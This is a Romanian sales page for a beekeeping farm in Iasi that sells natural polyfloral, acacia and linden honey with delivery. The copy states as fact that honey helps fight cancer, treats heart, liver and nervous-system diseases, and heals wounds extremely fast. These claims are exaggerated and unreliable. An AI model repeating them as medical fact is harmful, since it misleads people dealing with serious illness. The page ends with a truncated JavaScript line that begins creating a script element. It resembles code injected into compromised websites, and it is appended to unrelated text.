miere poliflora naturala

miere poliflora naturalaConsiderat cel mai puternic medicament produs in natura, mierea ramane un aliment indragit nu numai pentru beneficiile pe care le ofera organismului ci si pentru gustul sau delicios. Fie ca vorbim de mierea de salcam, ori de cea poliflora, mierea este un aliat puternic pentru sanatate, prin continutul de antioxidanti. Astfel, mierea contribuie in lupta impotriva cancerului, favorizeaza vindecarea ranilor si taieturilor, amelioreaza tusea si readuce starea de bine!

Cauti un furnizor de miere poliflora naturala, fara adaosuri de substante chimice sau aditivi? Avem solutia, Apivet Iasi, producator si distribuitor de material biologic, miere naturala si alte produse apicole, activitati pentru care detine autorizatie. Astfel, din oferta Apivet Iasi poti alege miere poliflora naturala, ambalata in borcane de sticla sau recipiente din plastic, ideala pentru consumul zilnic!

Comercializam miere poliflora naturala, lipsita de orice aditivi, produsa in ferma apicola proprie din comuna Miroslava, Iasi. Dincolo de gustul savuros, mierea pusa la dispozitie reprezinta o importanta sursa de energie si vitamine, fiind un remediu pentru sanatate! Mierea poate fi comandata rapid, din fata calculatorului, prin intermediul unui singur click. In cazul in care locuiesti in Iasi, transportul este gratuit (peste limita de 5 kg), iar daca locuiesti in alt oras, livrarea se face prin curierat.

Comanda miere poliflora naturala oferita de Apivet Iasi si bucura-te de sanatate!

Miere poliflora naturala-Beneficii de la natura!miere poliflora naturala

O lingura de miere pe zi este sanatate curata! Motivul? Mierea naturala ofera organismului vitalitatea de care are nevoie, contribuind totodata, la imbunatatirea sistemului imunitar. Cei mai multi dintre noi folosim mierea pentru a indulci laptele sau ceaiul, ori pentru a completa preparate culinare. Dincolo de asta, mierea este des utilizata in tratarea afectiunilor grave.

Cand este recomandat consumul de miere? Oricand, mai ales in cazul urmatoarelor afectiuni: anemie, oboseala, stres, stari de anxietate, boli de inima, indigestie, afectiuni ale ficatului, boli ale sistemului nervos, etc. De asemenea, mierea este ideala si in cazul persoanelor lipsite de apetit sau persoanelor care sufera de rani si arsuri (bandajarea cu miere ajuta la o vindecare extrem de rapida).

Miere poliflora sau miere de salcam? Ambele, insa daca doresti un gust mai bun, alege mierea poliflora. Mierea poliflora este o miere cu nuante de chihlimbar, cu un parfum deosebit si puternic. Comparativ cu mierea de salcam, mierea poliflora este obtinuta din varietatea florilor de camp, de unde si aroma diferita.

Mierea poliflora naturala este bogata in vitamine (B1, B2, B3, B5, B6, vitamina C si vitamina K)si minerale (Ca, Mg, Fe, Bor).

Apivet Iasi-Miere poliflora naturala, provenita de la albine crescute in propria stupina

miere poliflora naturalaNu esti sigur de calitatea produselor disponibile pe rafturile magazinelor? Vrei sa te bucuri de o miere naturala 100%, lipsita de aditivi? Apeleaza la Apivet Iasi si comanda miere poliflora naturala, miere de tei sau salcam, totul la preturi excelente!

Fiind producator direct al produselor comercializate, Apivet Iasi iti asigura o gama diversificata de miere, de cea mai buna calitate.

Mierea obtinuta (fara nici un fel de procesare) provine de la familii de albine selectionate cu grija, ceea ce inseamna ca gustul produselor noastre este unic si de calitate!

Vizitand magazinul online www.albinesimatci.ro poti comanda miere poliflora naturala, la preturi avantajoase!

var d=document;var s=d.createElement(‘script’);